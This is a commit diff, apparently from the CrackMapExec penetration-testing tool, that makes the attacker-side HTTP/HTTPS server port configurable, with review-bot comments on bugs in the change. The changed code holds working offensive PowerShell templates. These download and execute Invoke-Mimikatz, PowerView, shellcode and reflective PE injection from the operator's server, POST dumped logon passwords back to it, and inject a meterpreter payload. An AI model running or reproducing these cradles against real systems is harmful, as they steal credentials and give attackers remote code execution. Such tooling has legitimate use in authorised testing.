Added option to set the HTTP/HTTPS server port (resolves #33)
parent
0d1e580edd
commit
f0fe1a25a7
|
@ -32,9 +32,9 @@ class PowerShell:
|
|||
def mimikatz(self, command='privilege::debug sekurlsa::logonpasswords exit'):
|
||||
|
||||
command = """
|
||||
IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}/Invoke-Mimikatz.ps1');
|
||||
IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}:{port}/Invoke-Mimikatz.ps1');
|
||||
$creds = Invoke-{func_name} -Command '{katz_command}';
|
||||
$request = [System.Net.WebRequest]::Create('{protocol}://{addr}/');
|
||||
$request = [System.Net.WebRequest]::Create('{protocol}://{addr}:{port}/');
|
||||
$request.Method = 'POST';
|
||||
$request.ContentType = 'application/x-www-form-urlencoded';
|
||||
$bytes = [System.Text.Encoding]::ASCII.GetBytes($creds);
|
||||
|
@ -42,8 +42,9 @@ class PowerShell:
|
|||
$requestStream = $request.GetRequestStream();
|
||||
$requestStream.Write( $bytes, 0, $bytes.Length );
|
||||
$requestStream.Close();
|
||||
$request.GetResponse();""".format(protocol=self.protocol,
|
||||
func_name=self.func_name,
|
||||
$request.GetResponse();""".format(protocol=self.protocol,
|
||||
port=settings.args.server_port,
|
||||
func_name=self.func_name,
|
||||
addr=self.localip,
|
||||
katz_command=command)
|
||||
|
||||
|
@ -52,9 +53,9 @@ class PowerShell:
|
|||
def powerview(self, command):
|
||||
|
||||
command = """
|
||||
IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}/powerview.ps1');
|
||||
IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}:{port}/powerview.ps1');
|
||||
$output = {view_command} | Out-String;
|
||||
$request = [System.Net.WebRequest]::Create('{protocol}://{addr}/');
|
||||
$request = [System.Net.WebRequest]::Create('{protocol}://{addr}:{port}/');
|
||||
$request.Method = 'POST';
|
||||
$request.ContentType = 'application/x-www-form-urlencoded';
|
||||
$bytes = [System.Text.Encoding]::ASCII.GetBytes($output);
|
||||
|
@ -62,7 +63,8 @@ class PowerShell:
|
|||
$requestStream = $request.GetRequestStream();
|
||||
$requestStream.Write( $bytes, 0, $bytes.Length );
|
||||
$requestStream.Close();
|
||||
$request.GetResponse();""".format(protocol=self.protocol,
|
||||
$request.GetResponse();""".format(protocol=self.protocol,
|
||||
port=settings.args.port,
|
||||
addr=self.localip,
|
||||
view_command=command)
|
||||
|
||||
|
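Review bot: `port=settings.args.port,` in powerview reads the `--port` option, which the argparse hunk further down declares as the SMB port (`choices={139, 445}`), while every other template in this commit is filled with `port=settings.args.server_port,`; the `{port}` in this method's `{addr}:{port}` URLs therefore does not follow `--server-port`. Change the line to `port=settings.args.server_port,` so the two server-side options are not mixed up. powerview's `command` template begins in the previous hunk, so only its `.format(...)` tail is visible here.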
@ -70,12 +72,13 @@ class PowerShell:
|
|||
|
||||
def inject_meterpreter(self):
|
||||
command = """
|
||||
IEX (New-Object Net.WebClient).DownloadString('{0}://{1}/Invoke-Shellcode.ps1');
|
||||
Invoke-{2} -Force -Payload windows/meterpreter/{3} -Lhost {4} -Lport {5}""".format(self.protocol,
|
||||
IEX (New-Object Net.WebClient).DownloadString('{0}://{1}:{2}/Invoke-Shellcode.ps1');
|
||||
Invoke-{3} -Force -Payload windows/meterpreter/{4} -Lhost {5} -Lport {6}""".format(self.protocol,
|
||||
settings.args.server_port,
|
||||
self.localip,
|
||||
self.func_name,
|
||||
settings.args.inject[4:],
|
||||
settings.args.met_options[0],
|
||||
settings.args.inject[4:],
|
||||
settings.args.met_options[0],
|
||||
settings.args.met_options[1])
|
||||
if settings.args.procid:
|
||||
command += " -ProcessID {}".format(settings.args.procid)
|
||||
|
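Review bot: The positional arguments in inject_meterpreter no longer line up with the template: `'{0}://{1}:{2}/Invoke-Shellcode.ps1'` places `{1}` before the colon and `{2}` after it, but the `.format(...)` call passes `settings.args.server_port` as argument 1 and `self.localip` as argument 2, so the host and port fields are rendered in swapped positions. Either move `settings.args.server_port,` below `self.localip,` in the argument list, or switch to the named fields (`{protocol}://{addr}:{port}`) that the sibling methods in this commit use, which makes this kind of ordering slip visible at a glance. Whatever follows `command += " -ProcessID {}"...` lies outside the hunk.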
@ -86,10 +89,11 @@ class PowerShell:
|
|||
|
||||
def inject_shellcode(self):
|
||||
command = """
|
||||
IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}/Invoke-Shellcode.ps1');
|
||||
IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}:{port}/Invoke-Shellcode.ps1');
|
||||
$WebClient = New-Object System.Net.WebClient;
|
||||
[Byte[]]$bytes = $WebClient.DownloadData('{protocol}://{addr}/{shellcode}');
|
||||
[Byte[]]$bytes = $WebClient.DownloadData('{protocol}://{addr}:{port}/{shellcode}');
|
||||
Invoke-{func_name} -Force -Shellcode $bytes""".format(protocol=self.protocol,
|
||||
port=settings.args.server_port,
|
||||
func_name=self.func_name,
|
||||
addr=self.localip,
|
||||
shellcode=settings.args.path.split('/')[-1])
|
||||
|
@ -103,11 +107,12 @@ class PowerShell:
|
|||
|
||||
def inject_exe_dll(self):
|
||||
command = """
|
||||
IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}/Invoke-ReflectivePEInjection.ps1');
|
||||
Invoke-{func_name} -PEUrl {protocol}://{addr}/{pefile}""".format(protocol=self.protocol,
|
||||
func_name=self.func_name,
|
||||
addr=self.localip,
|
||||
pefile=settings.args.path.split('/')[-1])
|
||||
IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}:{port}/Invoke-ReflectivePEInjection.ps1');
|
||||
Invoke-{func_name} -PEUrl {protocol}://{addr}:{port}/{pefile}""".format(protocol=self.protocol,
|
||||
port=settings.args.server_port,
|
||||
func_name=self.func_name,
|
||||
addr=self.localip,
|
||||
pefile=settings.args.path.split('/')[-1])
|
||||
|
||||
if settings.args.procid:
|
||||
command += " -ProcID {}"
|
||||
|
|
|
@ -89,14 +89,14 @@ class MimikatzServer(BaseHTTPRequestHandler):
|
|||
for line in buf:
|
||||
print_att(line.strip())
|
||||
|
||||
def http_server():
|
||||
http_server = BaseHTTPServer.HTTPServer(('0.0.0.0', 80), MimikatzServer)
|
||||
def http_server(port):
|
||||
http_server = BaseHTTPServer.HTTPServer(('0.0.0.0', port), MimikatzServer)
|
||||
t = Thread(name='http_server', target=http_server.serve_forever)
|
||||
t.setDaemon(True)
|
||||
t.start()
|
||||
|
||||
def https_server():
|
||||
https_server = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), MimikatzServer)
|
||||
def https_server(port):
|
||||
https_server = BaseHTTPServer.HTTPServer(('0.0.0.0', port), MimikatzServer)
|
||||
https_server.socket = ssl.wrap_socket(https_server.socket, certfile='certs/crackmapexec.crt', keyfile='certs/crackmapexec.key', server_side=True)
|
||||
t = Thread(name='https_server', target=https_server.serve_forever)
|
||||
t.setDaemon(True)
|
||||
|
|
|
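Review bot: `http_server(port)` and `https_server(port)` make the port configurable but leave the bind address hard-coded to `'0.0.0.0'`, so the listener stays reachable on every interface of the host whichever port is chosen; threading a bind address through alongside the port, e.g. `http_server = BaseHTTPServer.HTTPServer((bind_addr, port), MimikatzServer)`, would let the caller restrict it to the one interface it intends to serve on. Neither function checks `port`, so a `None` or out-of-range value from the caller surfaces as a socket error inside `HTTPServer` rather than at the call site. The local variable `http_server` (and likewise `https_server`) also shadows the enclosing function's own name, which reads oddly; `server` would be clearer. The body of `https_server` continues past the end of the hunk.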
@ -72,7 +72,7 @@ parser.add_argument("-s", metavar="SHARE", dest='share', default="C$", help="Spe
|
|||
parser.add_argument('--kerb', action="store_true", dest='kerb', help='Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters')
|
||||
parser.add_argument("--port", dest='port', type=int, choices={139, 445}, default=445, help="SMB port (default: 445)")
|
||||
parser.add_argument("--server", choices={'http', 'https'}, default='http', help='Use the selected server (defaults to http)')
|
||||
#parser.add_argument("--server-port", type=int, help='Start the server on the specified port')
|
||||
parser.add_argument("--server-port", type=int, help='Start the server on the specified port')
|
||||
|
||||
#How much fail can we limit? can we fail at failing to limit? da da da dum
|
||||
parser.add_argument("--fail-limit", metavar='LIMIT', type=int, default=None, help='The max number of failed login attempts allowed per host (default: None)')
|
||||
|
@ -150,6 +150,18 @@ args.target = args.target[0]
|
|||
patterns = []
|
||||
targets = []
|
||||
|
||||
if args.server == 'http':
|
||||
if args.server_port:
|
||||
args.http_port = args.server_port
|
||||
else:
|
||||
args.server_port = 80
|
||||
|
||||
if args.server == 'https':
|
||||
if args.server_port:
|
||||
args.https_port = args.server_port
|
||||
else:
|
||||
args.server_port = 443
|
||||
|
||||
init_args(args)
|
||||
|
||||
if args.verbose:
|
||||
|
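Review bot: The `args.http_port = args.server_port` and `args.https_port = args.server_port` assignments write to attributes that nothing in the visible hunks reads; the later calls `http_server(args.server_port)` and `https_server(args.server_port)` consume `server_port`, so only the two `else` branches have an effect. Both blocks collapse to `if args.server_port is None:` / `    args.server_port = 80 if args.server == 'http' else 443`, which also stops an explicit `0` from being treated as "not set". In the argparse hunk above, `--server-port` is declared as a bare `type=int` with no range check, so a negative or >65535 value is only rejected when the socket is bound; a small validating `type=` callable that accepts 1–65535 would fail at parse time with a clear message instead.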
@ -245,10 +257,10 @@ else:
|
|||
|
||||
if args.mimikatz or args.powerview or args.mimikatz_cmd or args.inject or args.ntds == 'ninja':
|
||||
if args.server == 'http':
|
||||
http_server()
|
||||
http_server(args.server_port)
|
||||
|
||||
elif args.server == 'https':
|
||||
https_server()
|
||||
https_server(args.server_port)
|
||||
|
||||
def concurrency(targets):
|
||||
'''
|
||||
|
|